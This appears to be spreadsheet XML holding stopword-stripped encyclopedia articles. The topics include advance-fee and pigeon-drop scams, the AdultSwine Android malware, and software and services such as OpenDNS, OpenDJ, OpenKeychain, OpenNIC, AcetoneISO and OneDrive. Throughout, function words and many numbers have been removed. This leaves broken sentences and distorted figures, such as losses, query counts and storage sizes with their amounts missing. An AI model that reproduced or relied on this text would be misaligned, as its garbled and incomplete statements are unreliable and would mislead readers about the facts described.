transportation charges, survey etc. indian government issuing public notices media spread awareness among public warn mobile tower fraudsters. other scams other scams involve unclaimed property, also called "bona vacantia" united kingdom. england wales (other duchy lancaster duchy cornwall), property administered bona vacantia division treasury solicitor's department. fraudulent emails letters claiming department reported, informing recipient beneficiary legacy requiring payment sending information releasing money. united states, messages falsely claimed national association unclaimed property administrators (naupa), real organization, cannot make payments.in variant fraud, alleged hitman writes someone explaining targeted kill them. tells knows allegations false, asks money target receive evidence person ordered hit.another variant advanced fraud known pigeon drop. this confidence trick mark, "pigeon", persuaded give money order secure rights larger money, valuable object. reality, scammers make money mark left nothing. process, stranger (actually confidence trickster) puts money mark's money envelope, briefcase, bag) mark apparently entrusted with; actually switched full newspaper worthless material. through various theatrics, mark given opportunity leave money without stranger realizing. reality, mark would fleeing money, still handed accomplice).some scammers victims previous scams; known reloading scam. example, contact victim saying track apprehend scammer recover money lost victim, price. fund nigerian government compensate victims fraud, required proof loss, personal information, processing handling fee. recovery scammers obtain lists victims buying original scammers. consequences estimates total losses scam uncertain vary widely, since many people embarrassed admit gullible enough scammed report crime. united states government report 2006 indicated americans lost $198.4 million internet fraud 2006, averaging loss $5,100 incident. that year, report united kingdom claimed scams cost economy £150 million year, average victim losing £31,000. 2019, nigerian letter scams still annually collect $700,000 ($741,911 2021 dollars) $2,133 ($2,261 2021 dollars) person. addition financial cost, many victims also suffer severe emotional psychological cost, losing ability trust people. cambridgeshire, burnt death petrol realizing $1.2 million "internet lottery" actually scam. 2007 chinese student university nottingham killed discovered fallen similar lottery scam.other victims lose wealth friends, become estranged family members, deceive partners, divorced, commit criminal offenses process either fulfilling "obligations" scammers obtaining money. 2008, oregon woman lost $400,000 nigerian advance-fee fraud scam, email told inherited money long-lost grandfather. curiosity piqued actually grandfather family lost touch, whose initials matched given email. sent hundreds thousands dollars period years, despite family, bank staff enforcement officials urging stop. elderly particularly susceptible online scams this, typically come generation trusting, often proud report fraud. they also concerned relatives might sign declining mental capacity, afraid lose independence.victims enticed borrow embezzle money advance fees, believing shortly paid much larger able refund misappropriated. crimes committed victims include credit-card fraud, check kiting, embezzlement. diego-based businessman james adler lost million nigeria-based advance-fee scam. while court affirmed various nigerian government officials (including governor central bank nigeria) directly indirectly involved, nigerian government officials could sued u.s. courts "commercial activity" exception foreign sovereign immunities act, adler unable money back doctrine unclean hands knowingly entered contract illegal.some scams involve even serious crimes, kidnapping murder. case, 2008, involves osamai hitomi, japanese businessman lured johannesburg, south africa kidnapped september 2008. kidnappers took alberton, south johannesburg, demanded million ransom family. seven people ultimately arrested. july 2001, joseph raca, former mayor northampton, kidnapped scammers johannesburg, south africa, demanded ransom £20,000. captors released raca became nervous. scam ended murder occurred february 2003, jiří pasovský, 72-year-old scam victim czech republic, shot killed 50-year-old michael lekara wayid, official nigerian embassy prague, injured another person, nigerian consul general explained could return $600,000 pasovský lost nigerian scammer.the international nature crime, combined fact many victims want admit bought illegal activity, made tracking apprehending criminals difficult. furthermore, government nigeria slow take action, leading investigators believe nigerian government officials involved scams. nigeria government's establishment economic financial crimes commission (efcc) 2004 helped issue degree, although issues corruption remain. notable case efcc pursued emmanuel nwude, convicted defrauding $242 million director brazilian bank, banco noroeste, ultimately bank's collapse. also sars (special anti-robbery squad), division nigerian police force lately apprehending suspected fraud perpetrators. despite this, recent successes apprehending prosecuting criminals. 2004, fifty-two suspects arrested amsterdam extensive raid, almost emails reported sent local internet service providers. november 2004, australian authorities apprehended nick marinellis sydney, self-proclaimed head australian 419ers later boasted "220 african brothers worldwide" "the australian headquarters scams". 2008 authorities olympia, washington, sentenced edna fiedler years prison years supervised probation involvement million nigerian cheque scam. accomplice lagos, nigeria, shipped $1.1 million worth counterfeit cheques money orders instructions ship them. popular culture research suggests nigerian hip-hop musicians strong connections yahoo boys (cybercriminals). increased scams internet, used plot device many films, television shows books. song, chop your dollar", performed nkem owoh, also became internationally known anthem scammers using phrases "419 game, winner, loser". other appearances popular media include: 2016 short story nigerian prince when scammer becomes scammed toshua parker follows true story u.s. college student hacker 2000 targeted nigerian scammers stole millions back them. thief ni-moya", 1981 novella robert silverberg's majipoor series, young woman swindled savings pretense fees required inherit large estate. novel come chance nigerian author adaobi tricia nwaubani explores phenomenon. 2006 direct-to-dvd flick money features instance scam central premise. 2007 futurama straight-to-dvd film bender's score, professor farnsworth falls lottery scam, giving away personal details internet believing spanish national lottery. later, nixon's head falls "sweepstakes" letter scammers, zoidberg taken advance-fee fraud, thinking next nigerian prince. series episode television series real hustle, hustlers demonstrated scam hidden cameras "high stakes" episodes show. comedy series flight conchords episode "the cup", band's manager, murray, uses band's emergency funds appears scam—an investment offer made nigel soladu, e-mailed nigeria. however, turns nigel soladu real nigerian businessman investment offer legitimate, although murray notes that, despite soladu e-mailed many people investment, taken band receives 1000% profit, bailed jail. residents included song called nigerian friend" 2008 multimedia production bunny boy. pilot episode, "the nigerian job", leverage, group uses reputation nigerian scam deceitful businessman. 2012 novel will ferguson story daughter looking persons believes responsible father's death suicide following scam. follow-up earlier novels frauds (generica spanish fly), 2012 giller prize, canada's distinguished literary award. video game warframe, anyo advance-fee fraud operation false profit, players attempted reverse scam steal credits</t>
  </si>
  <si>
    <t>AdultSwine</t>
  </si>
  <si>
    <t>adultswine malware discovered 2018 check point software technologies. malware found programmed around apps google play store, primarily aimed children. would display pornographic that, clicked would instruct victims download malicious software attempt steal personal data. it's estimated million users infected.according representative google, apps removed play store developer accounts associated apps locked. check point cautions users extra vigilant installing apps, particularly intended children.” references external links list infected apps</t>
  </si>
  <si>
    <t>OneTo11</t>
  </si>
  <si>
    <t>oneto11 indian blockchain gaming platform multiple games. headquartered noida, india it's international office singapore. history oneto11 founded ravindra kumar, tirath chand sharma, manasvi singh anirban chatterjee september 2020.between january 2021 december 2021, oneto11 partnered dutch crypto investors, capital, technologies, oracles investment group international blockchain consulting. also crypto currency influencer carl renufelt jason stone. references</t>
  </si>
  <si>
    <t>Accounts &amp; SSO</t>
  </si>
  <si>
    <t>accounts sso, accounts-sso, lately gsso single sign-on framework computers. originating part maemo accounts-sso free software licensed lgpl 2.1. accounts-sso deployed standard component nokia n900, nokia tizen, ubuntu. later integrated plasma workspaces. history accounts-sso originally developed nokia eventually shipped part maemo november 2009.it later integrated meego handset software platform formally released 2011.after meego project ended, accounts-sso transferred independent project intel. canonical adopted accounts-sso ubuntu 12.10 (later also ubuntu touch) integrated november 2012. features among accounts-sso's features plugin-based architecture, working diverse user interfaces, storage back-ends, varying levels security.while accounts-sso primarily used centralized login management social networking services, e.g. sharing photos service image managing application chatting service instant messenger, plugin-based architecture also allows local usage, disk encryption cryptsetup plugin accounts-sso developed.the accounts-sso framework consists several individually released components: signond: daemon providing service d-bus originally qt-based, rewritten intel using glib. libaccounts-glib: glib-based client library managing accounts database. libaccounts-qt: client library managing accounts database qt-based applications implemented wrapper around libaccounts-glib. libsignon-glib: glib-based client library applications handling account authentication signond single sign-on service. signon plugins: handful signond authentication plugins developed within accounts-sso project. among plugins digest access, oauth, sasl, x.509. account plugins: accounts-sso project leaves development plugins specific services parties. open source plugins various services (facebook, google, twitter,...) developed canonical. also list single sign-on implementations external links official website development home gitlab.com online accounts ubuntu online accounts launchpad.net references</t>
  </si>
  <si>
    <t>OpenDJ</t>
  </si>
  <si>
    <t>opendj directory server implements wide range lightweight directory access protocol related standards, including full compliance ldapv3 also support directory service markup language (dsmlv2). written java, opendj offers multi-master replication, access control, many extensions. opendj began fork opends, ldap dsml server originated 2005 internal project microsystems started neil wilson, later grew open source project, maintained oracle corporation; following oracle's acquisition sun, opendj main trunk developed forgerock. maintained open identity platform community. opendj source code binary distribution available common development distribution license (cddl). history work opends started internal project around february 2005. opends initially developed primarily neil wilson. wilson joined small team engineers sun's directory server team. code open-sourced june 2006. increased number developers working opends technology open-sourcing code. developers outside also joined open-source project. community members like boni.org, penrose, jboss began opends projects. early 2008 opends project regular contributors. april 2007, project owners modified project governance. text "this project lead, appointed microsystems, responsible managing entire project" replaced "this project lead, appointed removed majority vote project owners, responsible managing entire project". september 2007, project owners laid microsystems. late 2007, questions arose whether project governed open source project. project owners complained publicly microsystems required project owners accept governance changes project order keep benefits. team resigned project owner role. simon phipps, chief open source officer microsystems, claimed reverting governance changes never approved. john waters also published article topic.opendj began acquisition microsystems oracle. time, oracle announced opends standard edition seen strategic product, although investment opends source code would continue. supported commercial versions opends standard edition since version 2008. mid-september 2010, ludovic poitou, opends community leader co-project owner, left oracle forgerock.in october 2010, oracle provided opends 2.2.1 update community several fixes.in december 2010, forgerock released opendj 2.4.0 including fixes support features like collective attributes, microsoft active directory permissive modification control, multiple objectclass inheritance.in late january 2011 matthew swift, previously "responsible core server" opends project joined forgerock work opendj product architect. starting mid-february 2011, forgerock began build "opendj product suite, comprising open source ldap directory server, client tools, ldap sdk" maven project, tools modules appearing first. 2011, months acquisition microsystems, oracle released oracle unified directory, based opends. forgerock posted opendj roadmap release targeted 2015.since november 2016, forgerock closed opendj source code, renamed opendj forgerock directory services started distribute commercial license. opendj 2.4, released december 2010, provided improvements corresponding many defined, scheduled opends 2.4opendj 2.6, released june 2013, provided rest ldap interface allowing easy secure access data, also eased integration services, provided native packages linux, ldap client sdk. latest forgerock release opendj 3.0.0.opendj expected include directory proxy services, support ldap transactions originally planned dropped incompatibility loose consistency model ldap. opendj slated include enhanced directory proxy services. opendj 4.1.4 resumed maintain open identity platform community issued release: also glassfish list ldap software openam references external links opendj github opendj documentation wiki opends website (archived 2007)</t>
  </si>
  <si>
    <t>OpenDNS</t>
  </si>
  <si>
    <t>opendns american company providing domain name system (dns) resolution services—with features phishing protection, optional content filtering, lookup servers—and cloud computing security product suite, umbrella, designed protect enterprise customers malware, botnets, phishing, targeted online attacks. opendns global network processes estimated billion queries daily million users data centers worldwide. august 2015, cisco acquired opendns us$635 million all-cash transaction, plus retention-based incentives opendns. opendns's business services renamed cisco umbrella; home products retained opendns name. cisco said intended continue development opendns cloud-based security products, would continue existing services. until june 2014, opendns provided ad-supported service paid advertisement-free service. services based software proprietary company. products services name "opendns" refers concept queries accepted source. related open source software; service based closed-source software. opendns offers resolution alternative using internet service providers' servers locally installed servers. opendns adopted supports dnscurve secure protocol.opendns provides following recursive nameserver addresses public use, mapped nearest operational server location anycast routing. opendns also provides following recursive nameserver addresses part familyshield parental controls block pornography, proxy servers, phishing sites. opendns sandbox rfc-compliant service provide level filtering. july 2013 opendns said handled billion requests daily.in many cases opendns provides negligible performance gain, process queries quickly slow servers. query results sometimes cached routers (e.g., local isps' queries cached isps' home routers), local operating system applications, differences speed noticeable requests stored local cache. service personal home 2007, opendns launched domain-blocking service block sites non-web servers categories, allowing control type sites accessed. categories overridden individually managed blacklists whitelists. 2008, opendns changed closed list blocked domains community-driven list allowing subscribers suggest sites blocking; enough subscribers (the number disclosed) concur categorization site, added appropriate category blocking. 2014 categories. basic opendns service require users register, using customizable block feature requires registration.other free, built-in features include phishing filter. opendns also service called phishtank users submit review suspected phishing sites. opendns supports dnscrypt protocol, authenticates traffic user's computer name servers. this requires installing free software onto supported devices.in december 2007 opendns began offering free dns-o-matic service provide method sending dynamic (ddns) updates several ddns providers using dyndns's update api. october 2009 opendns launched charged-for premium services called home offer increased reporting block features, services. service paid business 2009 opendns launched opendns enterprise, first foray enterprise-grade network security. opendns enterprise included ability share management product across team, along audit log, expanded malware protection, daily network statistic reports, custom block page url. opendns expanded enterprise product july 2012 opendns insights. this service featured integration microsoft active directory, allowed admins granular control creating policies per-user, per-device, per-group basis. umbrella november 2012 opendns launched network security product suite called umbrella, designed enforce security policies mobile employees work beyond corporate network using roaming devices windows laptops, iphones, ipads, provides granular network security devices behind network perimeter. february 2013 company launched opendns security graph support umbrella. security graph data-driven threat intelligence engine automatically updates malware, botnet, phishing domain blacklists enforced umbrella. data sourced requests opendns receives, plus routing tables managed opendns's network operations center. added features opendns introduced investigate feature umbrella november 2013. allows security teams compare local global traffic help determine intent attack, help incident response teams prioritize events. january 2014 intelligent proxy feature added umbrella suite. opendns intelligent proxy proxies connections requested domain scored suspicious tagged partially malicious opendns security graph. month later opendns announced technology integration partnership fireeye. collaboration allows indicators compromise forwarded fireeye’s real-time notification system umbrella, extending fireeye’s protection mobile employees branch offices. umbrella msps there distinct umbrella package msps. features protection regular business packages, offers additional features: centralized multi-tenant dashboard, on-demand monthly licensing, connectwise autotask integrations. history july 2006 opendns launched computer scientist entrepreneur david ulevitch, providing recursive resolution. received venture capital funding minor ventures, cnet founder halsey minor. october 2006 opendns launched phishtank, online collaborative anti-phishing database. before 2007 opendns using update dyndns handle updates users dynamic ips. june 2007 opendns started advanced filtering optionally block "adult content" free accounts. nand mulchandani, former head vmware's security group, left vmware join opendns november 2008, replacing founder david ulevitch, remained company's chief technology officer. david ulevitch resumed post opendns late 2009.sequoia capital greylock purchased majority shares held halsey minor july 2009 secondary transaction. then, conjunction ventures, remaining shares held minor purchased similar fashion early 2010. june 2010 opendns launched "familyshield", service designed filter sites pornographic content. service uses addresses 208.67.222.123 208.67.220.123. world economic forum announced company technology pioneer 2011. march 2012 hubbard, former websense, joined opendns cto. opendns security labs founded december 2012, serving research company. opendns launched security graph, security intelligence threat detection engine february 2013, followed series funding round. 2014 opendns announced series funding round totaling us$35 million, investors glynn capital management, northgate capital, mohr davidow ventures, lumia capital, evolution equity partners, cisco, chris sacca, naval ravikant, elad gill, well previous backers greylock partners, sequoia capital, sutter hill ventures.on august 2015, cisco acquired opendns us$635 million all-cash transaction, plus retention-based incentives opendns. opendns's business services renamed cisco umbrella; home products retained opendns name. cisco said intended continue development opendns cloud-based security products, would continue existing services. discontinued advertising opendns previously earned portion revenue resolving domain name opendns server name otherwise defined dns. this effect user typed non-existent name browser, user opendns search page. advertisers paid opendns advertisements sites page. this behavior similar verisign's previous site finder redirects many isp's place servers. opendns said advertising revenue paid free customized service. discontinued june 2014; opendns said move towards security focus business. reception 2007, david ulevitch explained that, response dell installing "browser address error redirector" software pcs, opendns started resolving requests google.com. some traffic handled opendns typo-correcting service corrects mistyped addresses redirects keyword addresses opendns's search page, rest transparently passed intended recipient.also, user's search request address browser configured google search engine (with certain parameter configured) covertly redirected server owned opendns (which within opendns terms service). users disable behavior logging opendns account unchecking "opendns proxy" option; mozilla users instead install extension, change remove navclient sourceid keyword search urls. this redirection breaks non-web applications rely getting nxdomain response non-existent domains, e-mail spam filtering, access private network's nameservers consulted public ones fail resolve. breaking local name resolution avoided configuring addresses forwarders local server router (the wan/internet configuration router gateway). purposes, addresses cannot configured forwarder, domains nxdomain response expected added exceptions users section opendns dashboard. most issues resolved opendns discontinued advertising service, started responding nxdomain servfail instead redirecting non-existing domains. also dnscrypt edns client subnet phishtank public recursive name server response policy zone references external links official website dark reading: opendns goes mobile nov. 2012 world: opendns introduces vpn, content filtering mobile devices nov. 2012 magazine: opendns extends company security mobile devices nov. 2012</t>
  </si>
  <si>
    <t>OpenKeychain</t>
  </si>
  <si>
    <t>openkeychain free open-source mobile android operating system provides strong, user-based encryption compatible openpgp standard. this allows users encrypt, decrypt, sign, verify signatures text, emails, files. allows user store public keys users interact, encrypt files specified user decrypt them. manner, file received another user public keys saved, receiver verify authenticity file decrypt necessary. mail support together mail, supports end-to-end encrypted emails openpgp inline pgp/mime formats. developers openkeychain mail trying change user interfaces email encryption designed. they propose remove ability create encrypted-only emails hide case signed-only emails. instead, focus end-to-end security provides confidentiality authenticity always encrypting signing emails together. reception openkeychain listed official openpgp homepage well-known developer collective guardian project recommends instead encrypt emails. techrepublic published article conclude "openkeychain happens easiest encryption tools available android (that also happens best follow openpgp standards)." publisher heise reviewed android magazine 2016 discussed openkeychain's backup mechanism. academic community uses openkeychain experimental evaluations: used example cryptographic operations could executed trusted execution environment. furthermore, modern alternatives public fingerprints implemented researchers. 2016, german federal office information security published study openpgp android evaluated openkeychain's functionality. openkeychain adapted work smartcards rings resulting usability study published ubicomp 2017. funding openkeychain developers participated google summer code programs total successful students. 2015, main developers one-year funding improve openpgp support mail paid open technology fund. history openkeychain created fork android privacy guard (apg) march 2012. between december 2010 october 2013 version released. thus, openkeychain started intention picking development improve user interface api. first version released january 2013. after three years without updates, merged back security fixes openkeychain months later rebased entire version openkeychain’s source code. however, process stopped march 2014, openkeychain developers continued regularly release versions. number vulnerabilities found cure53 fixed openkeychain. these still fixed since last release march 2014. since mail version 5.200, longer supported cryptography provider. references external links website openkeychain github repository openkeychain openkeychain google play openkeychain android package f-droid repository</t>
  </si>
  <si>
    <t>OpenLava</t>
  </si>
  <si>
    <t>openlava workload scheduler cluster computers. openlava pirated early version platform lsf. configuration file syntax, application program interface (api), command-line interface (cli) kept unchanged. therefore, openlava mostly compatible platform lsf. openlava based utopia research project university toronto.openlava allegedly licensed general public license licensing proven invalid trial. history 2007, platform computing (now part ibm) released platform lava 1.0, simplified version platform code, licensed general public license platform lava additional releases v1.0 discontinued 2011. june 2011, openlava code committed github. commercial support 2014, number former platform computing employees founded teraproc inc., contributed development provided commercial support openlava. commercially supported openlava contains add-on features community based openlava project. lawsuit october 2016, filed lawsuit alleging copyright infringement trade secrets misappropriation teraproc. complaint accused company's founders taking “confidential proprietary source code" ibm's spectrum product left, used basis competitive product openlava. david bigagli, teraproc employee started openlava project, posted notice github announcing downloads openlava disabled dmca takedown notice sent ibm's lawyers.bigagli later announced source code openlava would taken down, source code would restored order regain github repository openlava.org website, claiming dmca claim fraudulent.on september 2018, courts found favor issued permanent injunction teraproc agents. also list grid computing middleware distribution list free open-source software packages spectrum queue references</t>
  </si>
  <si>
    <t>OpenMG</t>
  </si>
  <si>
    <t>openmg digital rights management (drm) system developed sony managing protecting digital music data personal computer. originally designed audio files atrac3 format; compliant software, e.g. sony sonicstage, usually capable transcoding files openmg/atrac3. file extensions openmg-encrypted files .omg .oma. sister technologies openmg light (for mobile devices) openmg also created. development openmg created alongside magicgate effort protect digital music copyright. released alongside memory stick walkman vaio music clip. compliant secure digital music initiative (sdmi) version industry group specification formed february 1999. there least reported case security update windows windows 2000 broke openmg-compliant software. this issue later resolved. method audio files encrypted using openmg cannot played another computer. openmg consists "check-in" "check-out" system, whereby music file transferred computer three portable devices. cannot transferred fourth, unless least three devices gets checked back computer. compatible software openmg jukebox sonicstage magiqlip2 beatjam connect player x-app vaio mediathe compliant music organization systems work "checking out" "checking files to/from portable players, keeping copy unlocked order hinder proliferation copies. sonicstage includes option remove one's entire media library, allowing unrestricted use. however, feature disabled copies without license. criticisms openmg 'checking 'checking out' files cumbersome risky comparison unprotected data. side effects include user complaints locked original recordings, unable transfer computer. with sony portable audio players possible directly drag drop desired tracks device's visible directory. with combination openmg magicgate, sony intends restrict files moved instead copied, artificially emulating restrictions physical objects. however, recent releases sonicstage, files "checked out" library unlimited number times portable device, without need "check them. there anecdotal evidence openmg modules tend "choke" reading corrupted tags.a wall street journal article reviewed sony vaio music clip player 2000 noted openmg magicgate technologies "treats users like criminals". also atrac sonicstage magicgate notes external links atrac</t>
  </si>
  <si>
    <t>OpenNIC</t>
  </si>
  <si>
    <t>opennic (also referred opennic project) user-owned -controlled top-level network information center offers non-national alternative traditional top-level domain (tld) registries icann. january 2017, opennic recognizes peers existing icann tlds, compatibility reasons. however, opennic evaluated hold formal position future icann tlds.in addition resolving hostnames icann root, opennic also resolves hostnames opennic-operated namespaces, well within namespaces peering agreements established. some opennic recursive servers (tier servers) known high speeds latency, relative widely used recursors, well anonymizing no-logging policies. many servers offer dnscrypt. tier servers operated community volunteers across multitude geographic locations. like alternative root systems, opennic-hosted domains unreachable vast majority internet users, require non-default configuration one's resolver. history june 2000, article posted kuro5hin.org advocating democratically governed domain name system. first opennic servers went operation july year. opennic tlds opennic namespaces these tlds currently served opennic constructed approval opennic community. peering agreements opennic provides resolution select alternative roots. nations nations provides tlds nation-states recognized 3166-1 alpha-2 standard, therefore received cctld. currently provide (kurdish people), (tamil eelam), (tibet), (uyghur people). furnic furnic aims bring unique identity furries, furry fandom, anthropomorphic interest websites across internet. furnic opennic work closely, .fur (furry fandom) generally treated part opennic purposes, rather separate peer entity. emercoin january 2015, domains registered emercoin's blockchain became accessible users opennic dns. emercoin supports domain zones .bazar, .coin, .emc, .lib, .ness .sky. however, emercoin records registered/maintained within emercoin software, part opennic's management system. technical zones opennic operates special-use tlds, meant technical organizational purposes. suspended peering namecoin july 2019 opennic community voted 13-2 dropping support .bit domains "being used malware hubs" result "anonymous nature". similar proposal made december 2018 reach voting stage.until opennic resolved .bit (namecoin) domains centralized server generated zone namecoin blockchain. access provided tier server bridges opennic system namecoin. some opennic servers made spamhaus-maintained blacklist malicious .bit domains. also icann namecoin open root server network public recursive name servers opendns google public cloudflare public references external links official website</t>
  </si>
  <si>
    <t>AcetoneISO</t>
  </si>
  <si>
    <t>acetoneiso free open-source virtual drive software mount manage image files. goals simple, intuitive stable. written software meant people looking "daemon tools linux". however, acetoneiso emulate copy protection mounting.acetoneiso also supports direct access archive (*.daa) images uses non-free proprietary poweriso linux software backend converting images iso. recent releases 2010), acetoneiso also gained native support blanking cd/dvd optical discs burn iso/cue/toc images cd-r/rw dvd-+r/rw (including thanks external open source tools cdrkit, cdrdao growisofs. features mount automatically iso, bin, mdf, without need insert admin password. only single-track images supported moment. burn iso/toc/cue cd-r/rw optical discs burn images dvd-+r/rw (including native utility blank cd-rw, dvd-rw, dvd-rw discs nice display shows current images mounted possibility click quickly re-open mounted image convert image types: extract images content folder: play movie image kaffeine smplayer auto-cover download amazon generate folder cd/dvd check file image and/or generate text file calculate shasums images 128, 256, encrypt decrypt image split merge image megabyte compress high ratio image format *.bin make work epsxe/psx emulators restore lost file *.bin *.img convert *.dmg mountable image mount image specified folder user create database images manage collections extract boot image file cd/dvd backup cd-audio *.bin image complete localization english, italian, french, spanish polish quick simple utility xvid quick simple utility convert generic video (avi, mpeg, mov, wmv, asf) xvid quick simple utility convert video utility download videos youtube metacafe. extract audio video file extract *.rar archive password utility convert video sony playstation portable display history shows images mount time limitations does emulate copy protection mount like daemon tools. can't mount correctly multi-session image. only first track shown. converting multi-session image result loss data. only first track converted. image conversion possible x86-64 architecture poweriso limitations. internationalization acetoneiso currently translated english, italian, polish, spanish, romanian, hungarian, german, czech, russian. also cdemu furius mount list image software references notes external links acetoneiso sourceforge</t>
  </si>
  <si>
    <t>OneDrive</t>
  </si>
  <si>
    <t>microsoft onedrive (formerly skydrive) file hosting service operated microsoft. first launched august 2007, enables registered users share synchronize files. onedrive also works storage backend version microsoft office. onedrive offers storage space free charge, storage options available either separately office subscriptions.the onedrive client adds file synchronization cloud backup features device. comes bundled microsoft windows available macos, android, ios, windows phone, xbox 360, xbox one, xbox series addition, microsoft office apps directly integrate onedrive. history launch service, known windows live folders time (with codename skydrive), provided limited beta available testers united states. august 2007, service expanded wider audience. shortly thereafter, august 2007, service renamed windows live skydrive made available testers united kingdom india. 2008 skydrive initially available countries regions, later expanded december 2008, capacity individual skydrive account upgraded microsoft added separate entry point called windows live photos allowed users access photos videos stored skydrive. this entry point allowed users "people tags" photos, download photos windows photo gallery file, well viewing exif metadata camera information photos uploaded. microsoft also added ability full-screen slide shows photos using silverlight. skydrive updated "wave release june 2010, added ability work office apps (now known office online), versioning. update, discontinuation windows live toolbar, ability synchronise share bookmarked links users skydrive also discontinued. however, users still able windows live mesh, replaced previous windows live favorites, synchronize favorites computers discontinuation february 2013.in june 2010, users office live workspace, released october 2007, migrated windows live office. migration included existing workspaces, documents, sharing permissions. merger services result microsoft's decision merge office live team windows live january 2009, well several deficiencies office live workspace, lacked high-fidelity document viewing allow files edited within browser. office live workspace also offer offline collaboration co-authoring functionality instead documents "checked out" "checked in", though service integrate sharedview real-time screen sharing. june 2011, microsoft overhauled user interface skydrive, built using html5 technologies. updated version featured caching, hardware acceleration, html5 video, quick views, cleaner arrangement photos infinite scrolling. microsoft also doubled file size limit file. with update, microsoft consolidated different entry points skydrive, windows live photos windows live office, single interface. files folders shared user, including windows live groups, also accessible interface. november 2011, microsoft updated skydrive make sharing file management easier, well html5 updates. this update also allowed users much storage (and much used), feature removed previous update part redesign.on december 2011, microsoft released skydrive apps windows phone, available store windows phone store respectively. april 2012, microsoft released skydrive desktop windows vista, well macos, allowing users synchronize files skydrive, much like windows live mesh, "fetch" files computer browser. addition, skydrive also provided additional storage available purchase reduced free storage space users (from gb.) existing users offered free upgrade offer retain free storage. updated skydrive also allowed files size (uploaded skydrive desktop app). update also brought additional features open document format (odf) capability, shortening services direct sharing files twitter. august 2012, microsoft announced update skydrive brought changes improvements skydrive.com, skydrive windows desktop skydrive part live connect. skydrive.com, updates brought "modern" design service consistent outlook.com, along update service also received improvements instant search, contextual toolbar, multi-select thumbnail view, drag-and-drop files folders, sorting improvements. skydrive windows desktop macos applications, update brought performance improvements photo uploads sync experience. update also improved skydrive removal file type restrictions, ability upload images full resolution, well skydrive file picker opening saving files. august 2012, microsoft released skydrive android google play store. september 2012, microsoft also introduced recycle feature skydrive announced skydrive allow users create online surveys excel app. lawsuit onedrive renaming microsoft became involved lawsuit british television broadcaster using word "sky", resulting high court ruling june 2013 service's brand breached sky's trademark. july 2013, joint press release microsoft, announced settlement reached result 'skydrive' name would changed 'onedrive'. allowed microsoft continue using brand "for reasonable period time allow orderly transition brand". change made platforms february 2014, following announcement january 27.on june 2015, microsoft launched improved design onedrive web.in 2015 microsoft removed unlimited storage plan office home, personal university packages, reduced free onedrive storage replaced paid subscriptions plans $1.99 month plan. these changes caused major controversy users, petitioned microsoft reverse plans. november 2015, response microsoft's november announcement, 70,000 people taken official onedrive uservoice voice concerns. according microsoft changes response people abusing service using onedrive store backups, movie collections, recordings. storage quota july 2018 service offers free storage users. additional storage available purchase.the amount storage available changed several times. initially, service provided storage and, year, additional free storage students. users signed onedrive prior april 2012 able opt-in limited time offer free storage upgrade. service built using html5 technologies, files uploaded drag drop browser, onedrive desktop application microsoft windows from september 2013 onwards, addition free storage users eligible free upgrade), power users required storage could choose four paid storage plans.users regions need certain payment card paypal account pay. paid storage plan renewed automatically year unless microsoft user cancels service.upon re-launch onedrive, monthly payment plans introduced, along ability earn free storage referring users onedrive (500 each), users enable automatic uploads photos using onedrive mobile apps smartphones. subscribers office 365's home-oriented plans also receive additional storage service, user.in june 2014 announced onedrive's default storage would increase putting line competitor google drive. additional offered activating camera roll backup mobile device, putting ahead google drive november 2015, bonus cancelled. amount additional storage office subscribers also increased microsoft reduced price onedrive storage subscriptions time. october 2014 microsoft announced would offer unlimited onedrive storage office subscribers. however, november 2015, reinstated. microsoft additionally announced planned replacement plans plan early 2016, reduction free storage current accounts limit could keep increased storage least months. following calls microsoft reverse reduction decision, microsoft announced december year would allow existing users request free storage unaffected reduction, said would fully refund customers office satisfied cap, among redress.in june 2019, alongside announcement personal vault, microsoft announced would increase onedrive standalone storage plan additional charge, would giving office subscribers option storage need versioning onedrive initially store previous versions files, except microsoft office formats. july 2017, however, microsoft onedrive team announced version history support file types requested feature; such, onedrive would keep older versions files days. recycle onedrive implements "recycle bin"; files user chooses delete stored time, without counting part user's allocation, reinstated ultimately purged onedrive. download files entire folders downloaded single file onedrive. single download, limit total file size limit 10,000 files included file. files on-demand windows onedrive utilize files on-demand, files synchronized onedrive show file listings, require disk space. soon content file required, file downloaded background. editing office microsoft added office (known time office apps, later renamed office online office) capability onedrive "wave update, allowing users upload, create, edit share word, excel, powerpoint onenote documents directly within browser. addition, office allows multiple users simultaneously co-author excel documents browser, co-author onenote documents another user desktop application. users also view version history office documents stored onedrive. formats onedrive allows viewing documents portable document format (pdf), open document format (odf), xml-based file format supported number word processing applications, including microsoft office, libreoffice, apache openoffice corel's wordperfect. onedrive's search function supports search within documents.onedrive includes online text editor allows users view edit files plain text format, text files batch files. syntax highlighting code completion available number programming markup languages, including visual basic, javascript, windows powershell, css, html, xml, java. this online editor includes find-and-replace feature manage file merging conflicts. photos videos onedrive geo-location data photos uploaded service, automatically display tagged location. onedrive also allows users people photos uploaded interface windows photo gallery. onedrive also support app, microsoft photos. photos uploaded onedrive played automatic slideshow. images uploaded onedrive recognized 360° images clicked popular models 360° cameras panoramic mode, right within onedrive. client apps microsoft released onedrive client applications android, ios, windows windows windows mobile, windows phone xbox 360, xbox allow users browse, view organize files stored onedrive cloud storage. addition, microsoft also released desktop applications microsoft windows (vista later) macos (10.7 lion later) allow users synchronize entire onedrive storage computers offline access, well multiple computers. onedrive client windows allows users "fetch" contents browser, provided user enabled option; macos users fetch vice versa. android, windows phone versions also allow camera photos automatically uploaded onedrive. upon re-branding onedrive, xbox also added achievements.in addition client apps, onedrive integrated windows later, microsoft office 2010 later, well office photos windows phone, enabling users access documents, photos videos stored onedrive account. onedrive windows sync user settings files, either included onedrive (originally called skydrive, name changed windows update) file explorer, deprecating previous windows client. along reparse points, changes allow files accessed directly onedrive stored locally. onedrive also updated include local file manager. unlike windows onedrive windows requires user's windows account linked microsoft account; previous onedrive desktop client (which requirement) longer works windows 8.1. additionally, fetch feature work windows 8.1.in update july 2017, onedrive desktop client started showing error message effect local onedrive folder must located ntfs volume only. other file systems, including older fat32 exfat, well newer refs supported. microsoft commented always requirement; merely fixed warning displayed. microsoft also denied feature anything forthcoming onedrive files on-demand. integration microsoft office microsoft office, starting microsoft office 2010 microsoft office 2011, allows users directly open save documents onedrive, simultaneously edit shared documents users. changes synchronized document saved and, conflicts occur, saving user choose version keep; users also several different desktop programs edit shared document.microsoft onenote users sync notebooks using onedrive. once notebook selected sharing, onedrive copies notebook user's computer onedrive, online copy becomes original future changes. originating copy remains user's hard drive longer updated onenote. users switch back offline-only version notebook manually changing location onenote, unpredictable results occur, including onenote application crashing loss notebook data certain conditions. under circumstances, re-sharing notebook onedrive result recovery lost data. personal vault september 2019 microsoft announced personal vault. protected area onedrive users store important sensitive files photos without sacrificing 